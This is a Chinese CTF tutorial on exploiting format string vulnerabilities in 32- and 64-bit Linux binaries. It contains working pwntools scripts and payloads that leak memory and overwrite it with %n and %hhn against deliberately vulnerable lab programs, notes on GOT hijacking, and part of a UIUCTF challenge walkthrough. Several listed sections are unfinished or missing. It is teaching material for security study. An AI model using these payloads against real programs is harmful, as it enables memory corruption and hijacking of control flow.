文章目录

  • 格式化字符串
    • 1.原理
      • 1.1 格式化字符串介绍
        • 1.1.1 格式化字符串函数
        • 1.1.2 格式化字符串
        • 1.1.3 参数
      • 1.2 32位格式化字符串漏洞基本原理
      • 1.3 32位格式化字符串利用思路
        • 1.3.1 利用1:程序崩溃
        • 1.3.2 利用2:泄露内存
          • 1.3.2.1 泄露栈内存
            • 1.3.2.1.1 获取栈变量数值
            • 1.3.2.1.2 获取栈变量对应字符串
          • 1.3.2.2 泄露任意地址内存
        • 1.3.3 利用3:覆盖内存
          • 1.3.3.1 覆盖栈内存
          • 1.3.3.2 覆盖任意地址内存
            • 1.3.3.2.1 覆盖为小数字
            • 1.3.3.3.2 覆盖为大数字
      • 1.4 64位格式化字符串漏洞原理及其利用方式
      • 1.5 hijack GOT
      • 1.6 hijack retaddr
      • 1.7 堆上的格式化字符串漏洞
      • 1.8 格式化字符串盲打
      • 1.9 格式化字符串相关工具
        • 1.9.1 pwntools: fmtstr_payload
        • 1.9.2 pwngdb: fmtarg
    • 2.例题
      • 2.1 64位格式化字符串漏洞
        • 2.1.1 习题信息
        • 2.1.2 程序分析
      • 2.2 hijack GOT
        • 2.2.1 习题信息
        • 2.2.2 程序分析
      • 2.3 hijack retaddr
        • 2.3.1 习题信息
        • 2.3.2 程序分析
      • 2.4 堆上的格式化字符串漏洞
      • 2.5 格式化字符串盲打
        • 2.5.1 泄露栈
          • 2.5.1.1 习题信息
          • 2.5.1.2 程序分析
        • 2.5.2 盲打劫持got
          • 2.5.2.1 习题信息
          • 2.5.2.2 程序分析

格式化字符串

1.原理

1.1 格式化字符串介绍

格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。格式化字符串在利用的时候主要分为三个部分:

  • 格式化字符串函数
  • 格式化字符串
  • 后续参数,可选

例子如下:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PtWkLGtD-1635518717254)(https://ctf-wiki.org/pwn/linux/user-mode/fmtstr/figure/printf.png)]

1.1.1 格式化字符串函数

常见的有格式化字符串函数有

  • 输入:
    • scanf
  • 输出:
    • printf 输出到 stdout
    • fprintf输出到指定 FILE 流
    • vprintf根据参数列表格式化输出到 stdout
    • vfprintf根据参数列表格式化输出到指定 FILE 流
    • sprintf输出到字符串
    • snprintf输出指定字节数到字符串
    • vsprintf根据参数列表格式化输出到字符串
    • vsnprintf根据参数列表格式化输出指定字节到字符串
    • setproctitle设置 argv
    • syslog输出日志err, verr, warn, vwarn 等

1.1.2 格式化字符串

格式化字符串的格式的基本格式如下:

%[parameter][flags][field width][.precision][length]type

以下几个 pattern 中的对应选择需要重点关注

  • parameter
    • n$,获取格式化字符串中的指定参数,n表示第n个参数
  • flag
  • field width
    • 输出的最小宽度
  • precision
    • 输出的最大长度
  • length,输出的长度
    • hh,输出一个字节
    • h,输出一个双字节
  • type
    • d/i,有符号整数
    • u,无符号整数
    • x/X,16 进制 unsigned int 。x 使用小写字母;X 使用大写字母。如果指定了精度,则输出的数字不足时在左侧补 0。默认精度为 1。精度为 0 且值为 0,则输出为空。
    • o,8 进制 unsigned int 。如果指定了精度,则输出的数字不足时在左侧补 0。默认精度为 1。精度为 0 且值为 0,则输出为空。
    • s,如果没有用 l 标志,输出 null 结尾字符串直到精度规定的上限;如果没有指定精度,则输出所有字节。如果用了 l 标志,则对应函数参数指向 wchar_t 型的数组,输出时把每个宽字符转化为多字节字符,相当于调用 wcrtomb 函数。
    • c,如果没有用 l 标志,把 int 参数转为 unsigned char 型输出;如果用了 l 标志,把 wint_t 参数转为包含两个元素的 wchart_t 数组,其中第一个元素包含要输出的字符,第二个元素为 null 宽字符。
    • p, void * 型,输出对应变量的值。printf("%p",a) 用地址的格式打印变量 a 的值,printf("%p", &a) 打印变量 a 所在的地址。
    • n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。
    • %, '%'字面值,不接受任何 flags, width。

1.1.3 参数

就是相应的要输出的变量。

1.2 32位格式化字符串漏洞基本原理

我们用一个例子看一下格式化字符串的原理:

#include <stdio.h>int main() {printf("1: %s 2:%d, 3:%4.2f\n", "hello", 123, 3.1415);return 0;
}

编译命令:

gcc test.c -o test -m32

用gdb调试,在printf前打个断点:

 ► 0x565561fe <main+49>    call   printf@plt <printf@plt>format: 0x5655700e ◂— '1: %s 2:%d, 3:%d\n'vararg: 0x56557008 ◂— 'hello'0x56556203 <main+54>    add    esp, 0x100x56556206 <main+57>    mov    eax, 00x5655620b <main+62>    lea    esp, [ebp - 8]0x5655620e <main+65>    pop    ecx0x5655620f <main+66>    pop    ebx
────[ STACK ]───────────────────────────────────────────
00:0000│ esp 0xffffd100 —▸ 0x5655700e ◂— '1: %s 2:%d, 3:%d\n'
01:0004│     0xffffd104 —▸ 0x56557008 ◂— 'hello'
02:0008│     0xffffd108 ◂— 0x2
03:000c│     0xffffd10c ◂— 0x3

可以看到,还没有进入printf()时,栈顶是格式化字符串’1: %s 2:%d, 3:%d\n’,紧接着是第一个参数“hello”,然后是第二个参数“0x2”,第三个参数“0x3”。

因此,在32位下,格式化字符串的传参是根据栈上位置来确定的。

我们再看一下程序:

#include <stdio.h>int main() {printf("1: %p 2:%p, 3:%p\n");return 0;
}

看一下此时的栈:

 ► 0x565561f6 <main+41>    call   printf@plt <printf@plt>format: 0x56557008 ◂— '1: %p 2:%p, 3:%p\n'vararg: 0xffffd1c4 —▸ 0xffffd31c ◂— 0x746e6d2f ('/mnt')0x565561fb <main+46>    add    esp, 0x100x565561fe <main+49>    mov    eax, 00x56556203 <main+54>    lea    esp, [ebp - 8]0x56556206 <main+57>    pop    ecx0x56556207 <main+58>    pop    ebx
──────────────────────────────────────────[ STACK ]───────────────────────────────────────────
00:0000│ esp 0xffffd100 —▸ 0x56557008 ◂— '1: %p 2:%p, 3:%p\n'
01:0004│     0xffffd104 —▸ 0xffffd1c4 —▸ 0xffffd31c ◂— 0x746e6d2f ('/mnt')
02:0008│     0xffffd108 —▸ 0xffffd1cc —▸ 0xffffd353 ◂— 'SHELL=/bin/bash'
03:000c│     0xffffd10c —▸ 0x565561e5 (main+24) ◂— add    eax, 0x2df3
04:0010│     0xffffd110 —▸ 0xffffd130 ◂— 0x1

看一下printf()函数的运行结果:

pwndbg> n
1: 0xffffd1c4 2:0xffffd1cc, 3:0x565561e5

可见,就算没有参数,printf()函数也照样打印原来栈上的那几个位置。

因此,由于格式化字符串根据栈上位置来传参的原理,导致利用格式化字符串漏洞可以对栈上内容进行打印。

1.3 32位格式化字符串利用思路

下面介绍格式化字符串的3个利用方式:程序崩溃、泄露内存、覆盖内存

1.3.1 利用1:程序崩溃

因为栈上不可能每个地方都对应着合法的地址,因此我们只需要输入若干个%s,让格式化字符串对栈上地址进行寻址,当寻址到不合法的地址时,程序就会产生崩溃:

%s%s%s%s%s%s%s%s%s%s%s%s%s%s

1.3.2 利用2:泄露内存

1.3.2.1 泄露栈内存

格式化字符串使用"%n$d"可以索引到栈上第n+1个参数:

1.3.2.1.1 获取栈变量数值

例子如下:

#include <stdio.h>int main() {int a = 1, b = 2, c = 3;printf("%3$d\n", a, b, c);return 0;
}

如上,就只会以%d的格式打印第4个参数c。

还是一样,用gdb在进入printf前打个断点:

 ► 0x80491dd <main+71>    call   printf@plt <printf@plt>format: 0x804a008 ◂— '%3$d\n'vararg: 0x10x80491e2 <main+76>    add    esp, 0x100x80491e5 <main+79>    mov    eax, 00x80491ea <main+84>    lea    esp, [ebp - 8]0x80491ed <main+87>    pop    ecx0x80491ee <main+88>    pop    ebx
───────────────[ STACK ]───────────────────────────────────────────
00:0000│ esp 0xffffd100 —▸ 0x804a008 ◂— '%3$d\n'
01:0004│     0xffffd104 ◂— 0x1
02:0008│     0xffffd108 ◂— 0x2
03:000c│     0xffffd10c ◂— 0x3
04:0010│     0xffffd110 ◂— 0x1

发现使用"%3$d"会打印栈上第4个参数0x3,也就是最后会打印3。

pwndbg> n
3

那么,想要泄露栈变量的数值,我们只需要知道它在栈上的位置,就可以确定,我们使用什么样的格式化字符串。

1.3.2.1.2 获取栈变量对应字符串

进一步,如果我们使用"%n$s",就能够先寻址到栈上第n+1个参数,假设其值为A,然后再以字符串形式打印地址A对应的内容,达到获取栈变量对应字符串的目的。

举例如下:

#include <stdio.h>int main() {int a = 1, b = 2, c = 0x804a008;printf("%3$s\n", a, b, c);return 0;
}

在printf前打断点:

 ► 0x80491dd <main+71>    call   printf@plt <printf@plt>format: 0x804a008 ◂— '%3$s\n'vararg: 0x10x80491e2 <main+76>    add    esp, 0x100x80491e5 <main+79>    mov    eax, 00x80491ea <main+84>    lea    esp, [ebp - 8]0x80491ed <main+87>    pop    ecx0x80491ee <main+88>    pop    ebx
───────────[ STACK ]───────────────────────────────────────────
00:0000│ esp 0xffffd100 —▸ 0x804a008 ◂— '%3$s\n'
01:0004│     0xffffd104 ◂— 0x1
02:0008│     0xffffd108 ◂— 0x2
03:000c│     0xffffd10c —▸ 0x804a008 ◂— '%3$s\n'
04:0010│     0xffffd110 ◂— 0x1

现在想要泄露栈上0xffffd10c地址对应的字符串,也就是0x804a008所对应的字符串’%3$s\n’

执行完printf:

pwndbg> n
%3$s

发现成功获取。

因此,原理和1.3.2.1.1一样,只需要知道需要获取的栈变量位置即可知道该如何设置格式化字符串。

1.3.2.2 泄露任意地址内存

根据格式化字符串的结构(根据动态调试分析出来的),我们发现使用如下的格式构造格式化字符串能够获得addr位置的内容(注意这个需要关闭栈保护-fno-stack-protector):

addr%k$s

具体的k值在不同的系统和环境下不同,需要进行动态调试确定。

举个栗子:

程序如下:

#include <stdio.h>
int main() {char s[100];scanf("%s", s);  printf(s);return 0;
}

编译参数:

$ gcc test.c -o test -m32 -no-pie -fno-stack-protector

运行看看:

$ ./test
AAAA%7$p
AAAA0x41414141

发现使用%7$p时,可以将0x41414141打印出来,也就是AAAA,那么如果AAAA是一个合法的地址,我们使用%s就可以将其内容打印出来了。

我们使用gdb分析一下这里面的k值是如何确定的,以及32位下使用addr%k$s来获取任意地址内容的依据。

在scanf处输入AAAA%7$p,然后断点下载printf处,看一下栈帧:

 ► 0x80491f4 <main+62>    call   printf@plt <printf@plt>format: 0xffffd0ac ◂— 'AAAA%7$p'vararg: 0xffffd0ac ◂— 'AAAA%7$p'0x80491f9 <main+67>    add    esp, 0x100x80491fc <main+70>    mov    eax, 00x8049201 <main+75>    lea    esp, [ebp - 8]0x8049204 <main+78>    pop    ecx0x8049205 <main+79>    pop    ebx
─────────[ STACK ]───────────────────────────────────────────
00:0000│ esp 0xffffd090 —▸ 0xffffd0ac ◂— 'AAAA%7$p'
01:0004│     0xffffd094 —▸ 0xffffd0ac ◂— 'AAAA%7$p'
02:0008│     0xffffd098 —▸ 0xf7ffd990 ◂— 0x0
03:000c│     0xffffd09c —▸ 0x80491d1 (main+27) ◂— add    ebx, 0x2e2f
04:0010│     0xffffd0a0 —▸ 0x8048034 ◂— 0x6
05:0014│     0xffffd0a4 ◂— 0xc /* '\x0c' */
06:0018│     0xffffd0a8 —▸ 0xffffd108 —▸ 0xffffd1cc —▸ 0xffffd352 ◂— 'SHELL=/bin/bash'
07:001c│ eax 0xffffd0ac ◂— 'AAAA%7$p'

发现我们的AAAA%7$p位于栈上第8个位置**(第1个位置和第2个位置出现的不看,因为这个是printf函数的参数。看后面重复出现的,之所以重复出现的这是因为32位下特殊的栈结构)**,因此k值设置为7.

比如说我们现在想要获取每个需要的地址,如got[‘scanf’],拿pwntools写个代码获取:

exp如下:

#coding=utf-8
from pwn import *
sh = process('./test')
elf = ELF('./test')
__isoc99_scanf_got = elf.got['__isoc99_scanf'] #获取scanf函数的got地址
print hex(__isoc99_scanf_got)
payload = p32(__isoc99_scanf_got) + '%7$s' #将AAAA%7$p中的A替换成scanf函数的got地址
sh.sendline(payload)
print hex(u32(sh.recv()[4:8]))
sh.interactive()

脚本运行如下,成功打印处got[“scanf”] = 0xf7d80440

$ python2 exp.py 
[+] Starting local process './test': pid 25419
[*] '/mnt/d/study/ctf/\xe8\xb5\x84\xe6\x96\x99/ctf-challenges/pwn/fmtstr/test'Arch:     i386-32-littleRELRO:    Partial RELROStack:    No canary foundNX:       NX enabledPIE:      No PIE (0x8048000)
0x804c014
0xf7d80440

1.3.3 利用3:覆盖内存

上面我们只是实现了读取任意地址内存,但是更多地,我们希望能够堆任意地址的内存进行写入。在格式化字符串中,有个%n可以用来进行写入,我们就使用这个来对任意内存进行写入:

%n,不输出字符,但是把本次printf已经成功输出的字符个数写入对应的整型指针参数所指的变量。

能够利用的逻辑是:

  1. 因为%n能够把成功输出的字符个数写入到某个变量里面,而32位下,格式化字符串的变量存储在栈上。也就是说在32位内,会把本次printf成功输出的字符个数写入到栈上某个偏移存储的数字里。
  2. 那么我们想要写入的地址只需要确定栈上偏移(比如发现我们打算写入的地址已经在栈上存在,那么我们确定这个偏移即可,对应修改栈内存),或者我们主动把要写入的地址存储到栈上、同时自己构造偏移(要往哪个位置写入主动把这个地址放到栈上,对应修改任意地址内存)
  3. 写入的内容根据我们输出的字符个数决定(我们可以利用%xd来打印出x个字符,那么我们就可以把x写入)。

一般地,我们使用如下的构造方法来实现覆盖的目的:

...[overwrite addr]....%[overwrite offset]$n

其中… 表示我们的填充内容,overwrite addr 表示我们所要覆盖的地址,overwrite offset 地址表示我们所要覆盖的地址存储的位置为输出函数的格式化字符串的第几个参数。

一般来说,也是如下步骤:

  1. 确定覆盖地址
  2. 确定相对偏移
  3. 进行覆盖

下面,我们给出一个样例代码,利用这个代码对覆盖栈内存和任意地址内存进行介绍:

/* $ gcc test.c -m32 -o test -fno-stack-protector */
#include <stdio.h>
int a = 123, b = 456;
int main() {int c = 789;char s[100];printf("%p\n", &c);scanf("%s", s);printf(s);if (c == 16) {puts("modified c.");} else if (a == 2) {puts("modified a for a small number.");} else if (b == 0x12345678) {puts("modified b for a big number!");}return 0;
}

我们大概介绍一下上面的代码:

  1. 因为程序很多时候是开启了aslr,栈地址一直在变化。因此,程序故意输出了c变量的地址。
  2. 第9行,对s进行打印,是为了触发格式化字符串漏洞,实现对内存的修改
  3. c变量放在栈上,a和b变量是全局变量
  4. 对c的修改是在表示当前修改了栈内存
  5. 对a或者b的修改是为了表示对任意内存进行修改
1.3.3.1 覆盖栈内存

我们需要确定要写入的内容和被覆盖的地址:写入的内容就为16(这样符合程序的逻辑);被覆盖的地址我们需要根据偏移确定。确定偏移的方法还是和1.3.2.2里面确定偏移的方法一样。

我们向程序里面写入AAAA%p%p%p%p%p%p%p,然后看一下0x41414141是第几个输出,就知道AAAA这个字符串存在于多少的偏移了:

$ ./test
0xffcb064c
AAAA%p%p%p%p%p%p%p%p%p%p
AAAA0xffcb05e80xffcb06580x565d22280x565d10340xc0x414141410x702570250x702570250x702570250x70257025

发现0x41414141是第6个被打印的。因此,我们只需要将格式化字符串构造为:%12d%6$n,里面设置了12是因为一开始打印c的地址,里面4个字节,4+12恰好为16字节。

我们gdb也验证一下,scanf时写入AAAA%p%p%p%p%p%p%p,在第二个printf处打断点:

 ► 0x56556268 <main+91>     call   printf@plt <printf@plt>format: 0xffffd0a8 ◂— 'AAAA%p%p%p%p%p%p%p'vararg: 0xffffd0a8 ◂— 'AAAA%p%p%p%p%p%p%p'0x5655626d <main+96>     add    esp, 0x100x56556270 <main+99>     mov    eax, dword ptr [ebp - 0xc]0x56556273 <main+102>    cmp    eax, 0x100x56556276 <main+105>    jne    main+127 <main+127>0x56556278 <main+107>    sub    esp, 0xc
──[ STACK ]───────────────────────
00:0000│ esp 0xffffd090 —▸ 0xffffd0a8 ◂— 'AAAA%p%p%p%p%p%p%p'
01:0004│     0xffffd094 —▸ 0xffffd0a8 ◂— 'AAAA%p%p%p%p%p%p%p'
02:0008│     0xffffd098 —▸ 0xffffd118 ◂— 0x0
03:000c│     0xffffd09c —▸ 0x56556228 (main+27) ◂— add    ebx, 0x2da8
04:0010│     0xffffd0a0 —▸ 0x56555034 ◂— 0x6
05:0014│     0xffffd0a4 ◂— 0xc /* '\x0c' */
06:0018│ eax 0xffffd0a8 ◂— 'AAAA%p%p%p%p%p%p%p'
07:001c│     0xffffd0ac ◂— '%p%p%p%p%p%p%p'

发现AAAA确实出现在栈上第7个位置,是printf()函数的第7个参数,格式化字符串的第6个参数,因此设置为%6$n没问题。

现在我们要对栈上c的进行覆盖,我们只需要把AAAA更换为c的地址(已经在第一个printf被输出了),也就是说payload = address_c + ‘%012d%6$n’

exp如下:

# coding=utf-8
from pwn import *
sh = process('./test')
c_addr = int(sh.recvuntil('\n', drop=True), 16)
print hex(c_addr)
payload = p32(c_addr) + '%012d' + '%6$n'
print payload
# gdb.attach(sh)
sh.sendline(payload)
print sh.recv()
sh.interactive()

从结果来看,成功修改c:

$ python2 exp.py 
[+] Starting local process './test': pid 29334
0xff91b71c
\x1c\x91\xff%012d%6$n
\x1c\x91\xff-00007227720modified c.[*] Switching to interactive mode
[*] Process './test' stopped with exit code 0 (pid 29334)
[*] Got EOF while reading in interactive
$ 
[*] Interrupted
1.3.3.2 覆盖任意地址内存

对于1.3.3.1提出的构造方法:[addr]%$kn,那么我们覆盖的内容至少为4(32位下地址为4个字节),但是我们是有覆盖为更小数字的需求的,比如说覆盖为2,就需要特殊构造方式

我们也会需要将某个地址的内容覆盖为很大的数字,但是不可能说用%x$n,把x设置地很大,那样程序的栈空间也不够。

对于任意地址覆盖内存,分为覆盖为小数字和大数字两类。

1.3.3.2.1 覆盖为小数字

我们可以换一种构造方式:

aa%k$naa[addr]  # 确定aa的偏移,然后确定[addr]的偏移

因为aa%k为一个字节,$naa为一个字节,而前面的分析我们知道aa%k在偏移为6的位置,那么[addr]就在偏移为8的位置,则k为8。

看一下要修改的变量a的地址(这里为了确定a的地址把pie关掉了)是0x0804C024:

.data:0804C024                               public a
.data:0804C024 7B 00 00 00                   a dd 7Bh                      ; DATA XREF: main:loc_8049255↑r
.data:0804C028                               public b

即最后的格式化字符串设计为:aa%8$naa[0x0804C024]

同时%k$n前面的aa只有2个字符,因此覆盖的内容为2.

写个exp测试下:

# coding=utf-8
from pwn import *
sh = process('./test')
a_addr = 0x0804C024
payload = 'aa%8$naa' + p32(a_addr)
sh.sendline(payload)
print sh.recv()
sh.interactive()

看一下结果,发现修改成功:

$ python2 exp.py 
[+] Starting local process './test': pid 30453
0xffeb7f9c
aaaa$modified a for a small number.[*] Switching to interactive mode
[*] Process './test' stopped with exit code 0 (pid 30453)
[*] Got EOF while reading in interactive
$ 
[*] Interrupted
1.3.3.3.2 覆盖为大数字

我们使用%n来进行写入操作,可以在n前面加入参数:

  1. h:32位下,这样每次不会写入4个字节,只会写入2个字节
  2. hh:32位下,这样每次不会写入4个字节,只会写入1个字节

所以,比如我们要在地址addr处写入大数字b=0x12345678,我们可以分4次写入:

  1. 第一次在addr处写入0x78(这是小端序)
  2. 第二次在addr + 1处写入0x56
  3. 第三次在addr + 2处写入0x34
  4. 第四次在addr + 3处写入0x12

payload构造如下:

payload = p32(b_addr)+p32(b_addr+1)+p32(b_addr+2)+p32(b_addr+3)
payload += '%104x'+'%6$hhn'+'%222x'+'%7$hhn'+'%222x'+'%8$hhn'+'%222x'+'%9$hhn'

简单说下,上面的104是因为前面打印了16字节,16+104=120=0x78

exp如下:

# coding=utf-8
from pwn import *
sh = process('./test')
b_addr = 0x0804C028
payload = p32(b_addr)+p32(b_addr+1)+p32(b_addr+2)+p32(b_addr+3)
payload += '%104x'+'%6$hhn'+'%222x'+'%7$hhn'+'%222x'+'%8$hhn'+'%222x'+'%9$hhn'
sh.sendline(payload)
#sh.sendline(fmtstr_payload(6, {0x804A028:0x12345678}))
print sh.recv()
sh.interactive()

脚本测试结果如下,发现对b成功修改:

$ python2 exp.py 
[+] Starting local process './test': pid 6804
0xff8bd44c
()*+                                                                                                ff8bd3e8                                                                                                                                                                                                                      f7fa2990                                                                                                                                                                                                                       80491f1                                                                                                                                                                                                                       8048034modified b for a big number![*] Switching to interactive mode
[*] Process './test' stopped with exit code 0 (pid 6804)
[*] Got EOF while reading in interactive

1.4 64位格式化字符串漏洞原理及其利用方式

64位格式化字符串和32位的不同在于传参方式不同,因为64位下前6个参数都是存储在相应的寄存器中,其他的基本类似。因此利用方式也一样,只需要计算偏移时加上栈上的6个参数偏移。可以参考2.1的例题来加深理解

1.5 hijack GOT

hijack got意为劫持got表,也就是说对got表进行篡改。在没有开启relro保护的前提下,每一个libc函数对于的got表项都是可以进行修改的。因此,我们可以修改某个libc函数的got表为另外一个libc函数的got地址实现对于程序的控制。很直观地能够想到,我们把printf的got表项改为system函数的地址。那么,调用printf()时就变为了调用system()。

从上面可以看出,核心就算实现将函数A的地址覆盖为函数B的地址,也就是实现任意地址写,可以采用如下的流程:

  1. 确定A的got表地址:一般来说在程序中已有,直接读就行

  2. 确定B的内存地址:一般来说,需要想办法进行泄露

  3. 将函数B的内存地址写入到A的GOT表地址处,也就是任意地址写:

    1. 写入函数:write()
    2. ROP:
    pop eax; ret;           # printf@got -> eax
    pop ebx; ret;           # (addr_offset = system_addr - printf_addr) -> ebx
    add [eax] ebx; ret;     # [printf@got] = [printf@got] + addr_offset
    
    1. 格式化字符串任意地址写

1.6 hijack retaddr

利用格式化字符串漏洞来劫持程序的返回地址到我们想要执行的地址。

1.7 堆上的格式化字符串漏洞

等到学完堆,再回来完善这块,先鸽掉

1.8 格式化字符串盲打

只给定ip地址和端口,没有给定二进制文件,思路基本和brop一样,不同的是把栈溢出漏洞换成了格式化字符串漏洞。

思路流程:

  1. 确定程序位数
  2. 确定漏洞位置
  3. 利用

1.9 格式化字符串相关工具

1.9.1 pwntools: fmtstr_payload

fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')

param1 offset: 表示格式化字符串的偏移;
param2 writes: 表示需要利用%n写入的数据,采用字典形式,我们要将printf的GOT数据改为system函数地址,就写成{printfGOT: systemAddress};比如要将0x0804a048处改为0x2223322,就写{0x0804a048: 0x2223322}
param3 numbwritten: 表示已经输出的字符个数,这里没有,为0,采用默认值即可;
param4 write_size: 表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hhn写。
return: fmtstr_payload函数返回的就是payload

sample:

payload = fmtstr_payload(7, {puts_got: system_addr})

1.9.2 pwngdb: fmtarg

该函数能够找到需要的地址在格式化字符串函数里面的偏移,但是它需要停在<printf@plt+0>时才能使用:

──────────── stack ────
0x00007fffffffdf58│+0x0000: 0x0000000000400890  →  <main+234> mov edi, 0x4009b8  ← $rsp
0x00007fffffffdf60│+0x0008: 0x0000000031000001
0x00007fffffffdf68│+0x0010: 0x0000000000602ca0  →  0x0000363534333231 ("123456"?)
0x00007fffffffdf70│+0x0018: 0x00000000006022a0  →  0x0000000000000000
0x00007fffffffdf78│+0x0020: 0x00007fffffffdf80  →  "flag{11111111111111111"
0x00007fffffffdf80│+0x0028: "flag{11111111111111111"
0x00007fffffffdf88│+0x0030: "11111111111111"
0x00007fffffffdf90│+0x0038: 0x0000313131313131 ("111111"?)
───── code:x86:64 ────0x400630 <__stack_chk_fail@plt+0> jmp    QWORD PTR [rip+0x2009f2]        # 0x601028 <__stack_chk_fail@got.plt>0x400636 <__stack_chk_fail@plt+6> push   0x20x40063b <__stack_chk_fail@plt+11> jmp    0x400600→   0x400640 <printf@plt+0>   jmp    QWORD PTR [rip+0x2009ea]        # 0x601030 <printf@got.plt>0x400646 <printf@plt+6>   push   0x30x40064b <printf@plt+11>  jmp    0x4006000x400650 <__libc_start_main@plt+0> jmp    QWORD PTR [rip+0x2009e2]        # 0x601038 <__libc_start_main@got.plt>0x400656 <__libc_start_main@plt+6> push   0x40x40065b <__libc_start_main@plt+11> jmp    0x400600
───────── threads ────
[#0] Id 1, Name: "goodluck", stopped 0x400640 in printf@plt (), reason: SINGLE STEP
─────── trace ────
[#0] 0x400640 → printf@plt()
[#1] 0x400890 → main()
[#2] 0x7ffff7deb0b3 → __libc_start_main(main=0x4007a6 <main>, argc=0x1, argv=0x7fffffffe098, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe088)
[#3] 0x4006d9 → _start()
───────────────────
Python Exception <class 'AttributeError'> partially initialized module 'pwndbg' has no attribute 'commands' (most likely due to a circular import): 
gef➤  fmtarg 0x00007fffffffdf78
The index of format argument : 10 ("\%9$p")

2.例题

2.1 64位格式化字符串漏洞

2.1.1 习题信息

习题来自:ctf-challenges/pwn/fmtstr/2017-UIUCTF-pwn200-GoodLuck

2.1.2 程序分析

checksec一下检查机制:

$ checksec goodluck
[*] '/mnt/d/study/ctf/资料/ctf-challenges/pwn/fmtstr/2017-UIUCTF-pwn200-GoodLuck/goodluck'Arch:     amd64-64-littleRELRO:    Partial RELROStack:    Canary foundNX:       NX enabledPIE:      No PIE (0x400000)

可以看到是64位程序,开了canary,nx,没开pie

IDA看一下:

int __cdecl main(int argc, const char **argv, const char **envp)
{char v4; // [rsp+3h] [rbp-3Dh]signed int i; // [rsp+4h] [rbp-3Ch]signed int j; // [rsp+4h] [rbp-3Ch]char *format; // [rsp+8h] [rbp-38h]_IO_FILE *fp; // [rsp+10h] [rbp-30h]char *v9; // [rsp+18h] [rbp-28h]char v10[24]; // [rsp+20h] [rbp-20h]unsigned __int64 v11; // [rsp+38h] [rbp-8h]v11 = __readfsqword(0x28u);fp = fopen("flag.txt", "r");for ( i = 0; i <= 21; ++i )v10[i] = _IO_getc(fp);fclose(fp);v9 = v10;puts("what's the flag");fflush(_bss_start);format = 0LL;__isoc99_scanf((__int64)"%ms", (__int64)&format);for ( j = 0; j <= 21; ++j )                   // 判断输入的和本地flag是否一致,如果一致打印flag;否则,跳出自己输入的flag{v4 = format[j];if ( !v4 || v10[j] != v4 )                  // 格式化字符串当前位为空// 或者flag[i] != format[i]{puts("You answered:");printf(format);puts("\nBut that was totally wrong lol get rekt");fflush(_bss_start);return 0;}}printf("That's right, the flag is %s\n", v9);fflush(_bss_start);return 0;
}

分析一下程序的逻辑,程序会将flag读入到栈上的v10里面,然后和自己输入的flag进行逐位比较,一旦某一位不一样,程序结束,打印格式化字符串,但是这里的格式化字符串存在漏洞。因为真实的flag存在于栈上,因此,可以利用格式化字符串计算偏移,把栈上的真实flag打印出来。

我们gdb看一下flag放在哪里,在printf前打个断点:

 ► 0x40088b <main+229>    call   printf@plt <printf@plt>format: 0x602ca0 ◂— 'AAAA%p%p%p%p'vararg: 0x602480 ◂— 'You answered:\ng\n111111}\n'0x400890 <main+234>    mov    edi, 0x4009b80x400895 <main+239>    call   puts@plt <puts@plt>0x40089a <main+244>    mov    rax, qword ptr [rip + 0x2007cf] <0x601070>0x4008a1 <main+251>    mov    rdi, rax0x4008a4 <main+254>    call   fflush@plt <fflush@plt>0x4008a9 <main+259>    mov    eax, 00x4008ae <main+264>    jmp    main+318 <main+318>0x4008b0 <main+266>    add    dword ptr [rbp - 0x3c], 10x4008b4 <main+270>    cmp    dword ptr [rbp - 0x3c], 0x150x4008b8 <main+274>    jle    main+168 <main+168>
──────[ STACK ]───────────────────────────────────
00:0000│ rsp 0x7fffffffdf60 ◂— 0x41000001
01:0008│     0x7fffffffdf68 —▸ 0x602ca0 ◂— 'AAAA%p%p%p%p'
02:0010│     0x7fffffffdf70 —▸ 0x6022a0 ◂— 0x0
03:0018│     0x7fffffffdf78 —▸ 0x7fffffffdf80 ◂— 'flag{11111111111111111'
04:0020│     0x7fffffffdf80 ◂— 'flag{11111111111111111'

发现栈上第4个位置是flag的地址,加上寄存器里面存储的前6个参数,也就是第10个偏移是格式化字符串的地址,减去一个格式化字符串,那就是格式化字符串的第9个参数,因此使用 %$9s 就能够打印出flag。

找偏移也可以使用pwngdb里面的fmtarg函数,它需要停在<printf@plt+0>时才能使用:

──────────── stack ────
0x00007fffffffdf58│+0x0000: 0x0000000000400890  →  <main+234> mov edi, 0x4009b8  ← $rsp
0x00007fffffffdf60│+0x0008: 0x0000000031000001
0x00007fffffffdf68│+0x0010: 0x0000000000602ca0  →  0x0000363534333231 ("123456"?)
0x00007fffffffdf70│+0x0018: 0x00000000006022a0  →  0x0000000000000000
0x00007fffffffdf78│+0x0020: 0x00007fffffffdf80  →  "flag{11111111111111111"
0x00007fffffffdf80│+0x0028: "flag{11111111111111111"
0x00007fffffffdf88│+0x0030: "11111111111111"
0x00007fffffffdf90│+0x0038: 0x0000313131313131 ("111111"?)
───── code:x86:64 ────0x400630 <__stack_chk_fail@plt+0> jmp    QWORD PTR [rip+0x2009f2]        # 0x601028 <__stack_chk_fail@got.plt>0x400636 <__stack_chk_fail@plt+6> push   0x20x40063b <__stack_chk_fail@plt+11> jmp    0x400600→   0x400640 <printf@plt+0>   jmp    QWORD PTR [rip+0x2009ea]        # 0x601030 <printf@got.plt>0x400646 <printf@plt+6>   push   0x30x40064b <printf@plt+11>  jmp    0x4006000x400650 <__libc_start_main@plt+0> jmp    QWORD PTR [rip+0x2009e2]        # 0x601038 <__libc_start_main@got.plt>0x400656 <__libc_start_main@plt+6> push   0x40x40065b <__libc_start_main@plt+11> jmp    0x400600
───────── threads ────
[#0] Id 1, Name: "goodluck", stopped 0x400640 in printf@plt (), reason: SINGLE STEP
─────── trace ────
[#0] 0x400640 → printf@plt()
[#1] 0x400890 → main()
[#2] 0x7ffff7deb0b3 → __libc_start_main(main=0x4007a6 <main>, argc=0x1, argv=0x7fffffffe098, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe088)
[#3] 0x4006d9 → _start()
───────────────────
Python Exception <class 'AttributeError'> partially initialized module 'pwndbg' has no attribute 'commands' (most likely due to a circular import): 
